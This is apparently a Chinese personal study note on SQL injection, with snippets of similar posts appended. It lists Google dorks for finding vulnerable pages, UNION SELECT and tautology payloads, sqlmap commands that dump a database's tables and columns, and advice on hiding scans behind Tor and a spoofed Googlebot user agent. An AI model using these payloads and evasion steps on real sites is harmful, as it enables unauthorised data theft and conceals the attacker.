sql注入學習簡單記錄

2021-09-20 05:10:52 字數 1102 閱讀 4049

參考文章

參考學習:

google search:

inurl:"products.php?prodid="

inurl:buy.php?category=

+order+by+1

+order+by+6

+union+select+1,2,3,4,5,6,7,8,9,10,11

有時伺服器不能直接理解@@ version命令,需要轉換它。您將需要使用convert(@@版本使用latin1)或unhex(hex(@@版本))替換@@版本。

sqlmap -u --time-sec 15

sqlmap -u --dbs

sqlmap -u -d acuart --tables

sqlmap -u -d acuart -t users --columns

sql注入攻擊的型別

經典sqli

盲注或推斷sql注入資料庫管理系統

特定的sqli

復合sqli

sql注入+認證不足

sql注入+ ddos 攻擊

sql注入+ dns劫持

sql注入+ xss

錯誤過濾的轉義字元

當使用者輸入未針對轉義字元 進行過濾時,會發生這種形式的sql注入 ,然後將其傳遞到sql語句

statement = "select*from users where name ='" + username + "';"

使用注釋甚至阻止查詢的其餘部分(有三種型別的sql注釋)。所有三行最後都有乙個空格:

' or '1'='1' --

' or '1'='1' ({

' or '1'='1' /*

and substring(@@version,1,1)=4

apt-get instal tor

torsqlmap -u --tor --tor-type=socks5

偽裝成googlebot:

sqlmap -u --tor --tor-type=socks5 --user-agent="googlebot (compatible; googlebot/2.1; +"

SQL注入學習

通常情況下,可能存在 sql 注入漏洞的 url 是類似這種形式 對 sql 注入的判斷,主要有兩個方面 可能存在 sql 注入攻擊的 asp php jsp 動態網頁中,乙個動態網頁中可能只有乙個引數,有時可能有多個引數。有時是整型引數,有時是字串型引數,不能一概而論。總之只要是帶有引數的 動態網...

SQL注入學習

2018 02 03 grant 授權語句 revoke 取消許可權 get 方式url的後面可以跟上?query語句 post方式可以上傳檔案或表單 cookie 需要關注的注入點 構造語句 admin or 1 1 回顯 使用union聯合語句 正常可執行 不正常會報錯 不回顯的叫盲注 whal...

關於SQL注入學習

知道sql injection 但是平時懶的去做這方面的東西,以後一定還得注意 net的專案看來要用儲存過程和分層方式來寫了 sql injection 講解 方法 網上蒐集 1.帶引數的的儲存過程來完成使用者驗證的過程 2.使用者通過 提交過來的變數引數進行檢查的 發現客戶端提交的引數中有 exe...